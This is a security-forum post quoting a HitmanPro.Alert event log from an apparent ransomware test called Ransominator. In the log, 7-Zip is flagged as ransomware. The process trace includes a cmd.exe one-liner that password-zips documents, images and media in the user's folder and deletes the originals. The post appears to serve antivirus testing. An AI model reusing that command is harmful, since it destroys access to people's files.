Kaspersky Security Cloud Free vs Ransominator (default settings)
<blockquote data-quote="Vitali Ortzi" data-source="post: 876715" data-attributes="member: 57714"><p>[SPOILER="Hitman Pro Alert ignore Symantec as it was disabled "]</p><p>Log Name: Application</p><p>Source: HitmanPro.Alert</p><p>Date: 27/04/2020 0:43:03</p><p>Event ID: 911</p><p>Task Category: Mitigation</p><p>Level: Error</p><p>Keywords: Classic</p><p>User: N/A</p><p>Computer: DESKTOP-9TB3DOM</p><p>Description:</p><p>Mitigation CryptoGuard</p><p>Timestamp 2020-04-26T21:43:03</p><p></p><p>Platform 10.0.17763/x64 v871 06_17%</p><p>PID 4132</p><p>Application C:\Program Files\7-Zip\7z.exe</p><p>Created 2020-03-17T07:34:42</p><p>Description 7-Zip Console 18.6</p><p></p><p>Filename C:\Program Files\7-Zip\7z.exe</p><p></p><p>Detection Generic.Ransom.C</p><p></p><p> 1*\Device\HarddiskVolume1\Users\admin\Documents\Nintendo - Game Boy Advance\2 Disney Games - Lilo & Stitch 2 + Peter Pan - Return to Neverland (Europe) (En,Fr,De,Es+En,Fr,De,Es,It,Nl).zip.geminis3</p><p> Created L0, Write T8620544 H8620196|^259 #1,2</p><p></p><p> 2*\Device\HarddiskVolume1\Users\admin\Documents\Nintendo - Game Boy Advance\2 Disney Games - Lilo & Stitch 2 + Peter Pan - Return to Neverland (Europe) (En,Fr,De,Es+En,Fr,De,Es,It,Nl).zip</p><p> Opened L8619687, Read T8620032|100% H17239374|200%|^70365 #2,1</p><p></p><p> 3 \Device\HarddiskVolume1\ProgramData\Symantec\Symantec Endpoint Protection\14.2.5587.2100.105\Data\Definitions\IPSDefs\20200424.061\idspep.dat</p><p> Opened L237576, Read T238080|100% H237576|100%|^119672 #3</p><p></p><p> 4 \Device\HarddiskVolume1\ProgramData\Symantec\Symantec Endpoint Protection\14.2.5587.2100.105\Data\IPS\IDSSettg.dat</p><p> Opened L8908, Read T9216|100% H17788|199%|^326915 #4</p><p></p><p> 5 \Device\HarddiskVolume1\ProgramData\Symantec\Symantec Endpoint Protection\14.2.5587.2100.105\Data\IPS\IDSSettg.dat</p><p> Opened L8908, Read T9216|100% H17788|199%|^326915 #5</p><p></p><p> 6 \Device\HarddiskVolume1\ProgramData\Symantec\Symantec Endpoint 
Protection\14.2.5587.2100.105\Data\IPS\IDSSettg.dat</p><p> Opened L8908, Read T9216|100% H17788|199%|^326915 #6</p><p></p><p> 7 \Device\HarddiskVolume1\ProgramData\Symantec\Symantec Endpoint Protection\14.2.5587.2100.105\Data\IPS\IDSSettg.dat</p><p> Opened L8908, Read T9216|100% H17788|199%|^326915 #7</p><p></p><p> 8 \Device\HarddiskVolume1\Users\admin\Documents\Nintendo - Game Boy Advance\2 Disney Games - Disney Sports - Football + Disney Sports - Skateboarding (Europe) (En,Fr,De,Es,It).zip</p><p> Opened, Deleted L19238769 P4984 #9</p><p></p><p> 9*\Device\HarddiskVolume1\Users\admin\Documents\Nintendo - Game Boy Advance\2 Disney Games - Disney Sports - Football + Disney Sports - Skateboarding (Europe) (En,Fr,De,Es,It).zip.geminis3</p><p> Created L0, Write T19239424 H19239254|^236 P4984 #10,11</p><p></p><p>10*\Device\HarddiskVolume1\Users\admin\Documents\Nintendo - Game Boy Advance\2 Disney Games - Disney Sports - Football + Disney Sports - Skateboarding (Europe) (En,Fr,De,Es,It).zip</p><p> Opened L19238769, Read T19238912|100% H38477538|200%|^181818 P4984 #11,10</p><p></p><p>11 \Device\HarddiskVolume1\ProgramData\Symantec\Symantec Endpoint Protection\14.2.5587.2100.105\Data\Definitions\IPSDefs\20200424.061\idspep.dat</p><p> Opened L237576, Read T238080|100% H237576|100%|^119672 P4984 #12</p><p></p><p>12 \Device\HarddiskVolume1\ProgramData\Symantec\Symantec Endpoint Protection\14.2.5587.2100.105\Data\IPS\IDSSettg.dat</p><p> Opened L8908, Read T9216|100% H17788|199%|^326915 P4984 #13</p><p></p><p>13 \Device\HarddiskVolume1\ProgramData\Symantec\Symantec Endpoint Protection\14.2.5587.2100.105\Data\IPS\IDSSettg.dat</p><p> Opened L8908, Read T9216|100% H17788|199%|^326915 P4984 #14</p><p></p><p>14 \Device\HarddiskVolume1\ProgramData\Symantec\Symantec Endpoint Protection\14.2.5587.2100.105\Data\IPS\IDSSettg.dat</p><p> Opened L8908, Read T9216|100% H17788|199%|^326915 P4984 #15</p><p></p><p>15 \Device\HarddiskVolume1\ProgramData\Symantec\Symantec Endpoint 
Protection\14.2.5587.2100.105\Data\IPS\IDSSettg.dat</p><p> Opened L8908, Read T9216|100% H17788|199%|^326915 P4984 #16</p><p></p><p>16 \Device\HarddiskVolume1\Users\admin\Documents\Nintendo - Game Boy Advance\007 - NightFire (USA, Europe) (En,Fr,De).zip</p><p> Opened, Deleted L4372785 P3368 #18</p><p></p><p>17*\Device\HarddiskVolume1\Users\admin\Documents\Nintendo - Game Boy Advance\007 - NightFire (USA, Europe) (En,Fr,De).zip.geminis3</p><p> Created L0, Write T4373504 H4373093|^306 P3368 #19,20</p><p></p><p>18*\Device\HarddiskVolume1\Users\admin\Documents\Nintendo - Game Boy Advance\007 - NightFire (USA, Europe) (En,Fr,De).zip</p><p> Opened L4372785, Read T4372992|100% H8745570|200%|^38398 P3368 #20,19</p><p></p><p>25*\Device\HarddiskVolume1\Users\admin\Documents\Nintendo - Game Boy Advance\007 - Everything or Nothing (USA, Europe) (En,Fr,De).zip.geminis3</p><p> Created L0, Write T5794304 H5793920|^251 P1504 #28,29</p><p></p><p>26*\Device\HarddiskVolume1\Users\admin\Documents\Nintendo - Game Boy Advance\007 - Everything or Nothing (USA, Europe) (En,Fr,De).zip</p><p> Opened L5793576, Read T5793792|100% H11587152|200%|^15566 P1504 #29,28</p><p></p><p>33*\Device\HarddiskVolume1\Users\admin\Documents\Nintendo - Game Boy Advance\007 - Everything or Nothing (Japan).zip.geminis3</p><p> Created L0, Write T5743104 H5743005|^277 P5240 #38,39</p><p></p><p>34*\Device\HarddiskVolume1\Users\admin\Documents\Nintendo - Game Boy Advance\007 - Everything or Nothing (Japan).zip</p><p> Opened L5742712, Read T5743104|100% H11485424|200%|^16437 P5240 #39,38</p><p></p><p></p><p></p><p>Loaded Modules (23)</p><p>-----------------------------------------------------------------------------</p><p>0000000000DD0000-0000000000E48000 7z.exe (Igor Pavlov), </p><p> Version: 18.6.0.0</p><p>00007FFB36470000-00007FFB3665D000 ntdll.dll (Microsoft Corporation), </p><p> Version: 10.0.17763.1158</p><p>00007FFB32240000-00007FFB32358000 hmpalert.dll (SurfRight B.V.), </p><p> Version: 
3.8.4.871</p><p>00007FFB36380000-00007FFB36433000 KERNEL32.dll (Microsoft Corporation), </p><p> Version: 10.0.17763.1158</p><p>00007FFB32630000-00007FFB328C5000 KERNELBASE.dll (Microsoft Corporation), </p><p> Version: 10.0.17763.1158</p><p>000000006DA90000-000000006DB23000 SYSFER.DLL (Symantec Corporation), </p><p> Version: 14.2.5536.2100</p><p>000000006D670000-000000006D998000 IPSEng64.dll (Symantec Corporation), </p><p> Version: 17.2.1.16</p><p>00007FFB339F0000-00007FFB33A93000 ADVAPI32.dll (Microsoft Corporation), </p><p> Version: 10.0.17763.1131</p><p>00007FFB34710000-00007FFB347AE000 msvcrt.dll (Microsoft Corporation), </p><p> Version: 7.0.17763.475</p><p>00007FFB33F80000-00007FFB3401E000 sechost.dll (Microsoft Corporation), </p><p> Version: 10.0.17763.1075</p><p>00007FFB337E0000-00007FFB33902000 RPCRT4.dll (Microsoft Corporation), </p><p> Version: 10.0.17763.864</p><p>00007FFB337D0000-00007FFB337D8000 PSAPI.DLL (Microsoft Corporation), </p><p> Version: 10.0.17763.1</p><p>00007FFB35EF0000-00007FFB35FB4000 OLEAUT32.dll (Microsoft Corporation), </p><p> Version: 10.0.17763.914</p><p>00007FFB32CE0000-00007FFB32D80000 msvcp_win.dll (Microsoft Corporation), </p><p> Version: 10.0.17763.1</p><p>00007FFB32BE0000-00007FFB32CDA000 ucrtbase.dll (Microsoft Corporation), </p><p> Version: 10.0.17763.719</p><p>00007FFB33AA0000-00007FFB33DCC000 combase.dll (Microsoft Corporation), </p><p> Version: 10.0.17763.1158</p><p>00007FFB32B60000-00007FFB32BDE000 bcryptPrimitives.dll (Microsoft Corporation), </p><p> Version: 10.0.17763.678</p><p>00007FFB36130000-00007FFB362C7000 USER32.dll (Microsoft Corporation), </p><p> Version: 10.0.17763.1158</p><p>00007FFB32610000-00007FFB32630000 win32u.dll (Microsoft Corporation), </p><p> Version: 10.0.17763.1</p><p>00007FFB34180000-00007FFB341A9000 GDI32.dll (Microsoft Corporation), </p><p> Version: 10.0.17763.592</p><p>00007FFB334F0000-00007FFB33689000 gdi32full.dll (Microsoft Corporation), </p><p> Version: 
10.0.17763.1158</p><p>00007FFB34630000-00007FFB3465E000 IMM32.DLL (Microsoft Corporation), </p><p> Version: 10.0.17763.719</p><p>000000006D4C0000-000000006D665000 7z.dll (Igor Pavlov), </p><p> Version: 18.6.0.0</p><p></p><p>Process Trace</p><p>1 C:\Program Files\7-Zip\7z.exe [4132] 2020-04-26T21:43:03</p><p> "C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p32113 "C:\Users\admin\Documents\Nintendo - Game Boy Advance\2 Disney Games - Lilo & Stitch 2 + Peter Pan - Return to Neverland (Europe) (En,Fr,De,Es+En,Fr,De,Es,It,Nl).zip.geminis3" "C:\Users\admin\Documents</p><p>2 C:\Windows\System32\cmd.exe [4380] 2020-04-26T21:42:57</p><p> C:\Windows\system32\cmd.exe /c for /r %USERPROFILE%\Documents %d in (*.jpg *.jpeg *.doc *docx *pdf *xls *xlsx *ppt *pptx *png *mp3 *txt *zip *rar *7z *mp3 *mp4) do "C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p32113 "%d.geminis3" "%d"</p><p>3 C:\Users\admin\Desktop\InventarioBodega.exe [4388] 2020-04-26T21:42:57</p><p>4 C:\Windows\explorer.exe [4556] 2020-04-26T18:17:07</p><p>5 C:\Windows\System32\userinit.exe [4532] 2020-04-26T18:17:04 19.4s</p><p>6 C:\Windows\System32\winlogon.exe [736] 2020-04-26T18:14:56</p><p> winlogon.exe</p><p>7 C:\Windows\System32\smss.exe [636] 2020-04-26T18:14:55 518ms</p><p> \SystemRoot\System32\smss.exe 000000dc 00000084 </p><p>8 C:\Windows\System32\smss.exe [392] 2020-04-26T18:14:29</p><p> \SystemRoot\System32\smss.exe</p><p></p><p>Dropped Files</p><p>1 C:\Users\admin\Documents\Nintendo - Game Boy Advance\2 Disney Games - Lilo & Stitch 2 + Peter Pan - Return to Neverland (Europe) (En,Fr,De,Es+En,Fr,De,Es,It,Nl).zip.geminis3</p><p> Dropped by \Device\HarddiskVolume1\PROGRA~1\7-Zip\7z.exe [4132]</p><p>1 C:\Users\admin\AppData\Local\Microsoft\Windows\Explorer\ThumbCacheToDelete\thm574B.tmp</p><p> Dropped by \Device\HarddiskVolume1\Windows\explorer.exe [4556]</p><p>2 C:\Users\admin\AppData\Local\Microsoft\Windows\Explorer\ThumbCacheToDelete\thm57AA.tmp</p><p> Dropped by \Device\HarddiskVolume1\Windows\explorer.exe 
[4556]</p><p>3 C:\Users\admin\AppData\Local\Microsoft\Windows\Explorer\ThumbCacheToDelete\thm57AB.tmp</p><p> Dropped by \Device\HarddiskVolume1\Windows\explorer.exe [4556]</p><p>4 C:\Users\admin\AppData\Local\Microsoft\Windows\Explorer\ThumbCacheToDelete\thm57BB.tmp</p><p> Dropped by \Device\HarddiskVolume1\Windows\explorer.exe [4556]</p><p>5 C:\Users\admin\AppData\Local\Microsoft\Windows\Explorer\ThumbCacheToDelete\thm57BC.tmp</p><p> Dropped by \Device\HarddiskVolume1\Windows\explorer.exe [4556]</p><p>6 C:\Users\admin\AppData\Local\Microsoft\Windows\Explorer\ThumbCacheToDelete\thm57BD.tmp</p><p> Dropped by \Device\HarddiskVolume1\Windows\explorer.exe [4556]</p><p>7 C:\Users\admin\AppData\Local\Microsoft\Windows\Explorer\ThumbCacheToDelete\thm57CE.tmp</p><p> Dropped by \Device\HarddiskVolume1\Windows\explorer.exe [4556]</p><p>8 C:\Users\admin\AppData\Local\Microsoft\Windows\Explorer\ThumbCacheToDelete\thm57CF.tmp</p><p> Dropped by \Device\HarddiskVolume1\Windows\explorer.exe [4556]</p><p>9 C:\Users\admin\AppData\Local\Microsoft\Windows\Explorer\ThumbCacheToDelete\thm57D0.tmp</p><p> Dropped by \Device\HarddiskVolume1\Windows\explorer.exe [4556]</p><p>10 C:\Users\admin\AppData\Local\Microsoft\Windows\Explorer\ThumbCacheToDelete\thm57D1.tmp</p><p> Dropped by \Device\HarddiskVolume1\Windows\explorer.exe [4556]</p><p>11 C:\Users\admin\AppData\Local\Microsoft\Windows\Explorer\ThumbCacheToDelete\thm57E2.tmp</p><p> Dropped by \Device\HarddiskVolume1\Windows\explorer.exe [4556]</p><p>12 C:\Users\admin\AppData\Local\Microsoft\Windows\Explorer\ThumbCacheToDelete\thm5802.tmp</p><p> Dropped by \Device\HarddiskVolume1\Windows\explorer.exe [4556]</p><p>13 C:\Users\admin\AppData\Local\Microsoft\Windows\Explorer\ThumbCacheToDelete\thm5803.tmp</p><p> Dropped by \Device\HarddiskVolume1\Windows\explorer.exe [4556]</p><p>14 C:\Users\admin\AppData\Local\Microsoft\Windows\Explorer\ThumbCacheToDelete\thm5814.tmp</p><p> Dropped by \Device\HarddiskVolume1\Windows\explorer.exe 
[4556]</p><p>15 C:\Users\admin\AppData\Local\Microsoft\Windows\Explorer\ThumbCacheToDelete\thm5815.tmp</p><p> Dropped by \Device\HarddiskVolume1\Windows\explorer.exe [4556]</p><p>16 C:\Users\admin\AppData\Local\Microsoft\Windows\Explorer\thumbcache_idx.db</p><p> Dropped by \Device\HarddiskVolume1\Windows\explorer.exe [4556]</p><p>17 C:\Users\admin\AppData\Local\Microsoft\Windows\Explorer\thumbcache_16.db</p><p> Dropped by \Device\HarddiskVolume1\Windows\explorer.exe [4556]</p><p>18 C:\Users\admin\AppData\Local\Microsoft\Windows\Explorer\thumbcache_32.db</p><p> Dropped by \Device\HarddiskVolume1\Windows\explorer.exe [4556]</p><p>19 C:\Users\admin\AppData\Local\Microsoft\Windows\Explorer\thumbcache_48.db</p><p> Dropped by \Device\HarddiskVolume1\Windows\explorer.exe [4556]</p><p>20 C:\Users\admin\AppData\Local\Microsoft\Windows\Explorer\thumbcache_96.db</p><p> Dropped by \Device\HarddiskVolume1\Windows\explorer.exe [4556]</p><p>21 C:\Users\admin\AppData\Local\Microsoft\Windows\Explorer\thumbcache_256.db</p><p> Dropped by \Device\HarddiskVolume1\Windows\explorer.exe [4556]</p><p>22 C:\Users\admin\AppData\Local\Microsoft\Windows\Explorer\thumbcache_768.db</p><p> Dropped by \Device\HarddiskVolume1\Windows\explorer.exe [4556]</p><p>23 C:\Users\admin\AppData\Local\Microsoft\Windows\Explorer\thumbcache_1280.db</p><p> Dropped by \Device\HarddiskVolume1\Windows\explorer.exe [4556]</p><p>24 C:\Users\admin\AppData\Local\Microsoft\Windows\Explorer\thumbcache_1920.db</p><p> Dropped by \Device\HarddiskVolume1\Windows\explorer.exe [4556]</p><p>25 C:\Users\admin\AppData\Local\Microsoft\Windows\Explorer\thumbcache_2560.db</p><p> Dropped by \Device\HarddiskVolume1\Windows\explorer.exe [4556]</p><p>26 C:\Users\admin\AppData\Local\Microsoft\Windows\Explorer\thumbcache_sr.db</p><p> Dropped by \Device\HarddiskVolume1\Windows\explorer.exe [4556]</p><p>27 C:\Users\admin\AppData\Local\Microsoft\Windows\Caches\{3DA71D5A-20CC-432F-A115-DFE92379E91F}.3.ver0x0000000000000136.db</p><p> Dropped 
by \Device\HarddiskVolume1\Windows\explorer.exe [4556]</p><p></p><p>Thumbprints</p><p>5ea4a9f95efe0979bc5e8ff5137ee4ef035231fce07e136c41611e8a79c49f1c</p><p></p><p>[/SPOILER]</p></blockquote><p></p>
C:\Windows\System32\userinit.exe [4532] 2020-04-26T18:17:04 19.4s 6 C:\Windows\System32\winlogon.exe [736] 2020-04-26T18:14:56 winlogon.exe 7 C:\Windows\System32\smss.exe [636] 2020-04-26T18:14:55 518ms \SystemRoot\System32\smss.exe 000000dc 00000084 8 C:\Windows\System32\smss.exe [392] 2020-04-26T18:14:29 \SystemRoot\System32\smss.exe Dropped Files 1 C:\Users\admin\Documents\Nintendo - Game Boy Advance\2 Disney Games - Lilo & Stitch 2 + Peter Pan - Return to Neverland (Europe) (En,Fr,De,Es+En,Fr,De,Es,It,Nl).zip.geminis3 Dropped by \Device\HarddiskVolume1\PROGRA~1\7-Zip\7z.exe [4132] 1 C:\Users\admin\AppData\Local\Microsoft\Windows\Explorer\ThumbCacheToDelete\thm574B.tmp Dropped by \Device\HarddiskVolume1\Windows\explorer.exe [4556] 2 C:\Users\admin\AppData\Local\Microsoft\Windows\Explorer\ThumbCacheToDelete\thm57AA.tmp Dropped by \Device\HarddiskVolume1\Windows\explorer.exe [4556] 3 C:\Users\admin\AppData\Local\Microsoft\Windows\Explorer\ThumbCacheToDelete\thm57AB.tmp Dropped by \Device\HarddiskVolume1\Windows\explorer.exe [4556] 4 C:\Users\admin\AppData\Local\Microsoft\Windows\Explorer\ThumbCacheToDelete\thm57BB.tmp Dropped by \Device\HarddiskVolume1\Windows\explorer.exe [4556] 5 C:\Users\admin\AppData\Local\Microsoft\Windows\Explorer\ThumbCacheToDelete\thm57BC.tmp Dropped by \Device\HarddiskVolume1\Windows\explorer.exe [4556] 6 C:\Users\admin\AppData\Local\Microsoft\Windows\Explorer\ThumbCacheToDelete\thm57BD.tmp Dropped by \Device\HarddiskVolume1\Windows\explorer.exe [4556] 7 C:\Users\admin\AppData\Local\Microsoft\Windows\Explorer\ThumbCacheToDelete\thm57CE.tmp Dropped by \Device\HarddiskVolume1\Windows\explorer.exe [4556] 8 C:\Users\admin\AppData\Local\Microsoft\Windows\Explorer\ThumbCacheToDelete\thm57CF.tmp Dropped by \Device\HarddiskVolume1\Windows\explorer.exe [4556] 9 C:\Users\admin\AppData\Local\Microsoft\Windows\Explorer\ThumbCacheToDelete\thm57D0.tmp Dropped by \Device\HarddiskVolume1\Windows\explorer.exe [4556] 10 
C:\Users\admin\AppData\Local\Microsoft\Windows\Explorer\ThumbCacheToDelete\thm57D1.tmp Dropped by \Device\HarddiskVolume1\Windows\explorer.exe [4556] 11 C:\Users\admin\AppData\Local\Microsoft\Windows\Explorer\ThumbCacheToDelete\thm57E2.tmp Dropped by \Device\HarddiskVolume1\Windows\explorer.exe [4556] 12 C:\Users\admin\AppData\Local\Microsoft\Windows\Explorer\ThumbCacheToDelete\thm5802.tmp Dropped by \Device\HarddiskVolume1\Windows\explorer.exe [4556] 13 C:\Users\admin\AppData\Local\Microsoft\Windows\Explorer\ThumbCacheToDelete\thm5803.tmp Dropped by \Device\HarddiskVolume1\Windows\explorer.exe [4556] 14 C:\Users\admin\AppData\Local\Microsoft\Windows\Explorer\ThumbCacheToDelete\thm5814.tmp Dropped by \Device\HarddiskVolume1\Windows\explorer.exe [4556] 15 C:\Users\admin\AppData\Local\Microsoft\Windows\Explorer\ThumbCacheToDelete\thm5815.tmp Dropped by \Device\HarddiskVolume1\Windows\explorer.exe [4556] 16 C:\Users\admin\AppData\Local\Microsoft\Windows\Explorer\thumbcache_idx.db Dropped by \Device\HarddiskVolume1\Windows\explorer.exe [4556] 17 C:\Users\admin\AppData\Local\Microsoft\Windows\Explorer\thumbcache_16.db Dropped by \Device\HarddiskVolume1\Windows\explorer.exe [4556] 18 C:\Users\admin\AppData\Local\Microsoft\Windows\Explorer\thumbcache_32.db Dropped by \Device\HarddiskVolume1\Windows\explorer.exe [4556] 19 C:\Users\admin\AppData\Local\Microsoft\Windows\Explorer\thumbcache_48.db Dropped by \Device\HarddiskVolume1\Windows\explorer.exe [4556] 20 C:\Users\admin\AppData\Local\Microsoft\Windows\Explorer\thumbcache_96.db Dropped by \Device\HarddiskVolume1\Windows\explorer.exe [4556] 21 C:\Users\admin\AppData\Local\Microsoft\Windows\Explorer\thumbcache_256.db Dropped by \Device\HarddiskVolume1\Windows\explorer.exe [4556] 22 C:\Users\admin\AppData\Local\Microsoft\Windows\Explorer\thumbcache_768.db Dropped by \Device\HarddiskVolume1\Windows\explorer.exe [4556] 23 C:\Users\admin\AppData\Local\Microsoft\Windows\Explorer\thumbcache_1280.db Dropped by 
\Device\HarddiskVolume1\Windows\explorer.exe [4556]
24 C:\Users\admin\AppData\Local\Microsoft\Windows\Explorer\thumbcache_1920.db Dropped by \Device\HarddiskVolume1\Windows\explorer.exe [4556]
25 C:\Users\admin\AppData\Local\Microsoft\Windows\Explorer\thumbcache_2560.db Dropped by \Device\HarddiskVolume1\Windows\explorer.exe [4556]
26 C:\Users\admin\AppData\Local\Microsoft\Windows\Explorer\thumbcache_sr.db Dropped by \Device\HarddiskVolume1\Windows\explorer.exe [4556]
27 C:\Users\admin\AppData\Local\Microsoft\Windows\Caches\{3DA71D5A-20CC-432F-A115-DFE92379E91F}.3.ver0x0000000000000136.db Dropped by \Device\HarddiskVolume1\Windows\explorer.exe [4556]

Thumbprints
5ea4a9f95efe0979bc5e8ff5137ee4ef035231fce07e136c41611e8a79c49f1c

Event Xml:
<Event xmlns="[URL]http://schemas.microsoft.com/win/2004/08/events/event[/URL]">
<System>
<Provider Name="HitmanPro.Alert" />
<EventID Qualifiers="0">911</EventID>
<Level>2</Level>
<Task>9</Task>
<Keywords>0x80000000000000</Keywords>
<TimeCreated SystemTime="2020-04-26T21:43:03.542132400Z" />
<EventRecordID>9047</EventRecordID>
<Channel>Application</Channel>
<Computer>DESKTOP-9TB3DOM</Computer>
<Security />
</System>
<EventData>
<Data>C:\Program Files\7-Zip\7z.exe</Data>
<Data>CryptoGuard</Data>
</EventData>
</Event>
[/SPOILER]
[/QUOTE]